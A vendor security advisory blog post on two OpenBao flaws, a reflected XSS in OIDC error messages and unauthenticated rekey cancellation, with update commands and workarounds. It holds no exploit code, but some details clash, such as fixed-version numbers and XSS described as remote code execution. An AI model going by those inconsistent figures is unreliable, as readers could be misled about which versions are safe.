OpenBao is a secrets management and access control solution. It helps organizations securely store and manage sensitive data, such as passwords, API keys, and certificates. OpenBao provides a centralized platform for managing secrets across different environments and applications.

What is reflected XSS?

Reflected XSS (Cross-Site Scripting) is a type of security vulnerability where malicious scripts are injected into a website through user input. When a user clicks a malicious link or submits a form with injected code, the script is executed in their browser, potentially allowing the attacker to steal cookies, redirect the user, or deface the website.

How does unauthenticated rekey cancellation affect OpenBao?

The unauthenticated rekey cancellation vulnerability in OpenBao allows an attacker to cancel root rekey and recovery rekey operations without proper authorization. This can lead to a denial of service, preventing legitimate users from performing these critical operations and potentially disrupting the system's security.

How do I mitigate the XSS vulnerability in OpenBao?

To mitigate the XSS vulnerability (CVE-2026-33758) in OpenBao, you should update to version v2.5.2 or later. Alternatively, you can remove any roles with `callback_mode` set to `direct`. This will prevent the vulnerable code from being executed.

NextGuard

Back to blog

CVSS 9.5CVE-2025-52894CVE-2026-33758

OpenBao Patches XSS and Unauthenticated Rekey Cancellation

Critical OpenBao vulnerabilities patched! CVE-2026-33758 details XSS in OIDC auth. CVE-2025-52894 allows unauth rekey cancel. Update now!

Published on April 3, 2026

Two new vulnerabilities have been identified in OpenBao. These include a reflected XSS vulnerability and an issue allowing unauthenticated cancellation of root rekey operations. Patches are available to address these issues, and users are urged to update immediately to mitigate potential risks.

CVE-2026-33758 has a critical CVSS score, indicating high exploitability and impact.

What is Github.com/openbao/openbao?

Github.com/openbao/openbao is a component for go. It provides functionality related to secrets management and access control. This component is used in various applications and systems to securely store and manage sensitive data. For more information, you can search all github.com/openbao/openbao CVEs.

CVE-2025-52894: Unauthenticated Rekey Cancellation in OpenBao

CVSS0.0

Affected versionsThis vulnerability affects OpenBao installations prior to version 2.2.2. All users are affected unless the configuration option `disable_unauthed_rekey_endpoints=true` is manually set.

No CVSS score provided.

EPSS score of 0.042 suggests low exploitability.

OpenBao allowed unauthenticated cancellation of root rekey and recovery rekey operations. An attacker could exploit this to cause a denial of service by canceling these operations without proper authorization.

How to fix CVE-2025-52894 in Github.com/openbao/openbao

Patch within 7 days

1.Update to OpenBao v2.3.1 or later.
2.Alternatively, manually set `disable_unauthed_rekey_endpoints=true` in your OpenBao configuration.

Update OpenBao

go get -u github.com/openbao/openbao@latest

Workaround: If using a proxy or load balancer, deny requests to the rekey endpoints from unauthorized IP ranges.

NextGuard automatically flags CVE-2025-52894 if Github.com/openbao/openbao appears in any of your monitored projects — no manual lookup required.

CVE-2026-33758: Reflected XSS in OpenBao OIDC Authentication

CVSS9.5

Affected versionsThis vulnerability affects OpenBao installations with OIDC/JWT authentication enabled and roles configured with `callback_mode=direct`. Users are affected if they have these configurations.

Critical severity due to remote code execution via XSS.

EPSS score of 0.121 indicates moderate exploitability.

OpenBao is vulnerable to reflected XSS in its OIDC authentication error message. An attacker could inject malicious scripts via the `error_description` parameter, potentially gaining access to user tokens.

How to fix CVE-2026-33758 in Github.com/openbao/openbao

Patch immediately

1.Update to OpenBao version v2.5.2 or later.

Update OpenBao

go get -u github.com/openbao/openbao@latest

Workaround: Remove any roles with `callback_mode` set to `direct`.

NextGuard can help you monitor your go dependencies and alert you to vulnerabilities like CVE-2026-33758.

Stay ahead of go vulnerabilities

Proactively manage your application security by identifying and remediating vulnerabilities. Use NextGuard to monitor your go dependencies and receive alerts on new threats.

Start Monitoring

Frequently asked questions

These vulnerabilities highlight the importance of staying up-to-date with security patches. Make sure to update your OpenBao installations and follow the recommended workarounds to protect your systems. You can see all go vulnerabilities on our platform.